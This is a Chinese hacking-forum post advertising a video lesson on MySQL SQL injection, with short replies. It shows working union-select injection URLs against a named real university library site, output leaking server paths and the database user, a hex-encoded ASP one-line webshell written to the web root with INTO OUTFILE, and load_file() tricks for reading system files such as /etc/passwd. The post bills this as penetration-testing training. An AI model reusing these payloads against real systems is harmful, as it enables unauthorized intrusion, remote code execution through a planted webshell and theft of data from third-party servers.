HACK80 首页  立即注册  登录
现在注册
已注册用户请  登录
HACK80    视频教程

二期公开课第11节-MySQL5注入之写马拿webshell

  •   admin ·2015-4-2 21:54:42·16279 次点击 ·阅读模式     

    马上注册,加入HACK80!与我们一起交流。

    您需要 登录 才可以下载或查看,没有帐号?立即注册

    x
    截图
    捕获.PNG

    下载:
    http://pan.baidu.com/s/1o67NykE
    密码:
    游客,如果您要查看本帖隐藏内容请回复

    文字说明:
    大家好,欢迎来到由HACK80为大家带来的 大型网站渗透测试系列视频
    ----------------------------------------------------------
    公开群(1):173304941
    公开群(2):364716461
    论坛地址:http://www.hack80.com/
    -----------------------------------------------------------


    作者:IversOn5

    演示站点:http://rizal.lib.admu.edu.ph

    http://rizal.lib.admu.edu.ph/rlcontents.asp?nID=14 and 1=2 union select 1,2,group_concat(version(),0x2d,user(),0x2d,database(),@@datadir,0x2d,@@basedir),4,5,6--
    -5.1.43-community
    -webuser@rizal.lib.admu.edu.ph
    -dbnews
    -C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
    -C:\Program Files\MySQL\MySQL Server 5.1\


    http://rizal.lib.admu.edu.ph/rlcontents.asp?nID=14 and (select count(*) from mysql.user)>0--  返回正确

    c:\windows\system32\inetsrv\MetaBase.xml  //IIs配置文件
    c:\\inetpub\\wwwroot

    http://rizal.lib.admu.edu.ph/rlcontents.asp?nID=14 and 1=2 union select 1,2,0x3C25593D726571756573742822312229253E203C2565786563757465285929253E,4,5,6 into outfile 'c:\\inetpub\\wwwroot\\hack80.asp'--

    <%Y=request("1")%> <%execute(Y)%>

    1.magic_quotes_gpc off ' on '-->\'
    2.权限足够大
    3.物理路径(绝对路径)
    4.linux服务器--网站的根目录是不可写、、、图片目录
    5.windows-->要双斜杠

    通过注入读文件使用load_file()命令。这是MySQL以文本方式读取文件的参数,例如:linux系统的网站load_file(‘/etc /passwd’)或者windows系统的网站load_file(‘c:\\boot.ini’)。这个参数可以用的前提是,你user()得到的用户名(参见关于mysql.user表介绍),在mysql.user表中的字段file_priv设置为Y(即用户有文件操作权限),则load_file()参 数则可用。需要注意的是,如果为windows系统,保险起见将路径设置为双斜杠\\ 因为在计算机语言中双斜杠才是单斜杠的意思,如果为单斜杠,例如d:\table,那么这个路径中得\t就会被解析为键盘上的tab键,\n\r类似,最 终得不到想要的结果。很多时候,php的网站的gpf会设置为on(就是对特殊字符做修改,例如单引号’自动修改为\’),那么load_file(‘c:\\boot.ini’)就变成:load_file(\’c:\\\\boot.ini\’)出现语法错误,得不到结果
    解决方法就是,和concat参数一样,hex混用,将c:\\boot.ini进行hex编码,得 到:0x633a5c5c626f6f742e696e69,原语句修改 为:union+select+1,load_file(0x633a5c5c626f6f742e696e69)即可。使用load_file参数后面可以不加from。




    http://rizal.lib.admu.edu.ph/rlnews.asp?nID=192 and 1=2 union select 1,2,group_concat(@@datadir,0x2d,@@basedir,0x2d,version(),0x2d,database(),0x2d,user()),4,5,6,7,8,9




    16279 次点击 · 3 人收藏  
    收藏  转播  分享
    55 回复
      Reply  
    Aronxcs  2017-4-15 11:17:56 
    没金币想学学也学不了{:4_135:}
      Reply  
    methofhack  2016-4-26 00:17:24 
    楼主,这个里面整理的iis配置文件路径那个文档可以共享一下不,或者说一下那些服务器查询哪一个文件可以通过看path爆出绝对路径呢,谢谢
      Reply  
    7734416  2015-4-2 23:41:02 
    支持。。。。
      Reply  
    a0932881  2015-4-3 00:41:21 
    提示: 作者被禁止或删除 内容自动屏蔽
      Reply  
    520zy  2015-4-3 01:22:15 
    谢谢,大大了、、、、、、、、、、
      Reply  
    windsstory  2015-4-3 02:41:54 
    沙发!沙发!
      Reply  
    1026166703  2015-4-3 08:35:37 
    支持。。。。{:4_120:}
      Reply  
    939902009  2015-4-3 10:35:23 
    学习学习~{:4_122:}
      Reply  
    daisukidesu  2015-4-3 16:54:49 

    学习学习~{:4_122:}
      Reply  
    ercJUl  2015-4-3 18:54:31 
    有意思~~~嘿嘿
      Reply  
    lwb6565  2015-4-4 21:30:26 
    支持了!!!!!
    添加一条新回复
    您需要登录后才可以回帖 登录 | 立即注册

    本节点积分规则
    QQ
    小黑屋   ·   手机版   ·   197 人在线 最高记录 5500   ·   TOP
    我们很年轻,但我们有信念、有梦想!

      我们坚信只有今天付出了,才有机会看到明天的太阳!现在!加入我们,给你一个气氛优秀的技术圈子。  
    GMT+8, 2018-5-26 12:17, Processed in 0.051191 second(s), 25 queries .